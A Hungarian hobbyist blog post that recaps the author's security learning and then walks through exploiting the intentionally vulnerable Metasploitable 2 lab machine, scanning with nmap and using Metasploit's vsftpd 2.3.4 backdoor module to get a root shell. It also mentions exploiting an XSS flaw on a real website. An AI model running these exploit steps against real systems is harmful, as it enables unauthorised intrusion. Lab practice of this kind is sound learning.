Napi hackelés

Napi hackelés

metasploitable 2, egy full sebezhető virtuális gép, 21-es port

2021. március 20. - c3llenger

Mostanában nagyon nem volt blog...  a téma nem állt meg, csak több olyan való életbeli problémát kellett megoldani ami miatt erre nem volt idő. Sajnos, nem sajnos de egy kicsit ki is kellett menni valós életbe a virtuális gépekről.

Itt volt egy kis erkölcsi dilemmám, de győzött a bal vállamon ülő angyal és még az is lehet hogy az illetékes oldal figyelmét felhívom a visszaélés lehetőségére.

Amúgy egy XSS befecskendezésről van szó, amit egy honlap kereső mezőjébe lehet beirni, és mivel az oldal a kérést GET metódussal küldi, így lehet olyan linket összerakni, ahol javascript segítségével lehet plusz tartalmakat hozzátenni az oldalhoz, anélkül hogy annak tartalma más számára is változna. Valószínű hogy ennek technikai megvalósításáról lesz blog is.

Amikor a legutolsó blogot írtam, az sql befecskendezések voltak terítéken, gyakorló pályák, challengek stb.

Utána valahogy belefutottam egy androidos backdoor témába, jó pár exploitot gyártottam, teszteltem. Nagyon jó téma.
Aztán rátaláltam a TERMUX-ra, ami nagyon jó megoldás bizonyos dolgokat tesztelni, megoldani ha nincs laptop, csak okos telefon.
Utána jött egy kis programozós feladat, bár önszorgalomból, de az általam eddig utált JAVA nyelven kellett egy szerver -kliens oldali kommunikációt megírni. Arra mindenképpen jó volt hogy megszeressem a JAVA-t. Minden eddigi ellenszenvem elszállt. :) nem csak a python és a php a világ közepe

Aztán egy chat alkalmazást írtam, ahol a másik oldalról közelítettem meg a dolgokat, és itt a cél nem a sérülékenységek megtalálása volt ,hanem épp ellenkezőleg. Azt elérni hogy ne legyen sérülékenység :) Rájöttem hogy érdemes a kettőt együtt tanulni és gyakorolni. Sokkal hatásosabb lesz. Itt érintettem egy kis apache2 szerver konfigolást, csináltam https tanusitványt, bele kellett menni a portforwrdolásba, szóval csináltam egy webszervert.

Ezután belekóstoltam kicsit a reverse engineering-be. Androidos applikációt kellett visszafordiítani és kiszedni belőle tartalmakat, belenézni a működésébe.

Ezt követte a fentebb említett XSS sérülékenység felfedezése és kihasználása.

Most viszont visszatérek kicsit a "hackelésbe"

A metasploitable 2 virtuális gépet akarom végig csinálni, és ezt a blogon végig követni.

Szedjük le, rakjuk be virtuális gépbe, fontos hogy a hálózat beállításoknál NAT-olást használjunk.

ha elindítjuk akkor msfadmin user-rel és msfadmin jelszóval megy is a gép.
toljunk egy ifconfigot, lássuk hogy mi az ip címünk, majd menjünk át Kaliba, open terminal, majd jöhet egy nmap

Portszkenneléssel megnézzük a futó szolgáltatásokat:

nmap -sV 192.168.xxx.xxx 

elég gyorsan lefut, majd kilistázza hogy nagyon sok nyitott portot talált :)

kezdjük az elején, a 21-es porttal.
21/tcp open ftp vsftpd 2.3.4

egy másik terminálban írjuk be:
msfconsole - kis időt hagyunk neki majd ha betölt, akkor keressünk rá a vsftpd-re az alábbi módon:

search vsftpd

ki hitte, volna van is találat :)
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution

akkor ezt használjuk is:
use exploit/unix/ftp/vsftpd_234_backdoor

nézzük meg hogy milyen beállítások szükségesek neki:
show options

igazából csak az RHOSTS kell neki, úgyhogy:
set RHOSTS 192.168.xxx.xxx 

futtassuk:
exploit


pikk pakk lefut, és már tesztehetjük is:
ls
pwd
whoami    -root

azt hiszem ez elég könnyű volt,

 

A bejegyzés trackback címe:

https://napihack.blog.hu/api/trackback/id/tr6516386806

Kommentek:

A hozzászólások a vonatkozó jogszabályok  értelmében felhasználói tartalomnak minősülnek, értük a szolgáltatás technikai  üzemeltetője semmilyen felelősséget nem vállal, azokat nem ellenőrzi. Kifogás esetén forduljon a blog szerkesztőjéhez. Részletek a  Felhasználási feltételekben és az adatvédelmi tájékoztatóban.

Nincsenek hozzászólások.
süti beállítások módosítása